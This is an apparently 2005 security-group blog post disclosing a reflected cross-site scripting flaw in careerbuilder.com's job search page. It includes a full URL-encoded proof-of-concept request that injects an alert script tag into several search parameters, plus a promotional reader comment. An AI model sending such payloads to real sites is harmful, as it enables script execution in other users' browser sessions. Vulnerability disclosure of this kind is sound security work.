by r0t,der4444,cembo,VietMafia

Friday, December 02, 2005

careerbuilder.com XSS vuln.

careerbuilder.com XSS vuln.

Vuln. dicovered by : r0t
Date: 2 dec. 2005


Vuln. Description:
Input passed to the search parameters in "JobResults.aspx" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
/JobResults.aspx?S%3Asbkw=%3Cscript%3Ealert%
28%27r0t+llove+XSS%27%29%3C%2Fscript%3E&S%3
Asbcn=%3Cscript%3Ealert%28%27r0t+llove+XSS%
27%29%3C%2Fscript%3E&S%3Asbsn=ALL&S%3Asbfr=
30&S%3Asbsbmt=Search&cid=US&IPath=ILKG&excr
it=QID%3DA6652282763367%3Bst%3DA%3Buse%3DAL
L%3BrawWords%3D%3Cscript%3Ealert%28%27r0t+l
loves+XSS%27%29%3C%2Fscript%3E%3BTID%3D0%3B
CTY%3D%3Cscript%3Ealert%28%27r0t+lloves+XSS%
27%29%3C%2Fscript%3E%3BSID%3DALL%3BCID%3DUS
%3BENR%3DNO%3BDTP%3DDR3%3BYDI%3DYES%3BIND%3
DALL%3BPDQ%3DAll%3BJN%3DAll%3BPAYL%3D0%3BPA
YH%3DGT120%3BPOY%3DNO%3BETD%3DALL%3BRE%3DALL
%3BMGT%3DDC%3BSUP%3DDC%3BFRE%3D30%3BCHL%3DA
L%3BQS%3DSID_UNKNOWN%3BSS%3DNO%3BTITL%3D0%3
BJQT%3DRAD%3BEXJT%3D%3Cscript%3Ealert%28%27
ll%27%29%3C%2Fscript%3E

1 Comments:

Blogger Shawn T Lippert told...

Thank you for the informative blog
Here Is some additional
Job Search Resources for Jobs if you or your readers are interested.

1:02 PM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew